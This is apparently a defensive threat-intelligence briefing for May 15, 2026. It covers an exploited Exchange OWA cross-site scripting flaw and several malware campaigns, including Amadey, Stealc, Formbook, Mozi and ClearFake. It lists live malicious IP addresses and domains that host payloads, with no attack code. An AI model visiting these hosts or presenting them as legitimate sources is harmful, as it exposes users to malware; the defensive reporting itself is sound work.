This briefing covers threat intelligence for May 15, 2026. The primary focus is on active malware distribution infrastructure and a critical vulnerability in Microsoft Exchange Server. A significant volume of malicious URLs were identified distributing diverse malware families including Amadey, Stealc, Formbook, RemusStealer, Mozi botnet, and ClearFake campaign infrastructure. The KEV catalog added CVE-2026-42897, a cross-site scripting vulnerability in Microsoft Exchange Server Outlook Web Access that allows arbitrary JavaScript execution under specific interaction conditions.
The malware distribution activity demonstrates sophisticated infrastructure with multiple C2 monitoring systems, dropper chains, and targeting across multiple platforms including Windows, Linux, macOS, and IoT devices. Notable patterns include Amadey dropper campaigns delivering secondary payloads, Mozi botnet targeting IoT devices via shell scripts, and ClearFake campaigns using deceptive domains. Organizations should prioritize patching the Exchange Server vulnerability and implementing URL filtering for the identified malicious infrastructure.
The threat landscape shows continued reliance on compromised legitimate infrastructure, file-sharing services (Mega.nz), and temporary hosting platforms for malware distribution. Detection opportunities exist at network perimeters through URL filtering and at endpoints through behavioral analysis of dropper chains and scripting interpreter abuse.
CISA added one critical vulnerability to the Known Exploited Vulnerabilities catalog affecting Microsoft Exchange Server.
Microsoft Exchange Server contains a cross-site scripting vulnerability in Outlook Web Access that allows arbitrary JavaScript execution in browser context when specific interaction conditions are met. Added to KEV catalog indicating active exploitation in the wild.
47 malicious URLs identified distributing multiple malware families including stealers, droppers, botnets, and remote access tools across Windows, Linux, macOS, and IoT platforms.
Multiple URLs distributing Amadey dropper malware with active C2 monitoring infrastructure. Amadey serves as initial access vector for delivering secondary payloads including Stealc information stealer. Distribution via compromised infrastructure and temporary file hosting services.
Stealc stealer being distributed via Amadey dropper chains from IP 91.92.242.236. Multiple file payloads identified with C2 monitoring active, indicating credential and data theft capabilities.
Formbook infostealer distributed via malicious HTA files and PNG-disguised executables. Uses compromised WordPress infrastructure (fiinterchillers.com) and dynamic DNS hosting for C2 communications.
Multiple shell script payloads targeting MIPS architecture IoT devices. Distribution from multiple IP addresses indicates active botnet recruitment phase. Mozi targets unpatched routers and IoT devices for DDoS and cryptomining operations.
RemusStealer campaign dropping Phorpiex worm as secondary payload via compromised WordPress infrastructure. Demonstrates multi-stage infection with information stealing followed by worm propagation capabilities.
PowerShell-based fileless loader campaign specifically targeting Brazilian users. Delivers stealer payload without writing traditional executables to disk, complicating detection by traditional antivirus.
Three malicious domains identified hosting ClearFake campaign payloads using deceptive naming conventions mimicking legitimate services. ClearFake typically delivers browser-based social engineering attacks and drive-by downloads.
Extensive malware distribution infrastructure from IP 45.156.87.31 hosting payloads for multiple processor architectures (ARM4-7, MIPS, x86, SH4, PPC). Indicates IoT botnet recruitment campaign targeting diverse embedded systems and routers.
Malicious URLs specifically targeting macOS systems via endpoint-api-node.com and download-api-endpoint.com infrastructure. Indicates cross-platform threat actor operations expanding beyond traditional Windows targets.
Malware distributed via password-protected ZIP archives hosted on toolkeep.org masquerading as legitimate software (Wondershare Filmora). Password protection technique used to evade email security gateways and sandbox analysis.
Analysis of malware distribution methods and infection chains reveals common TTPs across multiple threat actors.
Multiple campaigns employ multi-stage dropper chains with active C2 monitoring tags. Amadey serves as first-stage loader delivering secondary payloads including Stealc, enabling modular payload delivery and complicating attribution.
Threat actors leveraging compromised WordPress sites and legitimate web infrastructure for malware distribution, providing trusted reputation to evade URL reputation filtering and increasing victim trust during social engineering.
Simultaneous campaigns targeting Windows, Linux, macOS, and diverse IoT architectures indicates sophisticated threat actor capabilities and infrastructure. Shell script payloads targeting MIPS and ARM processors demonstrate focus on router and embedded device compromise.
These briefings are compiled from publicly available threat-intelligence feeds, which may include CISA KEV, NIST NVD, the GitHub Advisory Database (OSV), abuse.ch, and Wordfence Intelligence. Data-breach and credential-leak items may include data from Have I Been Pwned and ransomware.live.
CVE® is a registered trademark of The MITRE Corporation. CVE Records are © The MITRE Corporation, reproduced under the CVE Program Terms of Use. WordPress vulnerability data is provided by Wordfence Intelligence, © Defiant, Inc. Breach data from Have I Been Pwned is licensed under CC BY 4.0.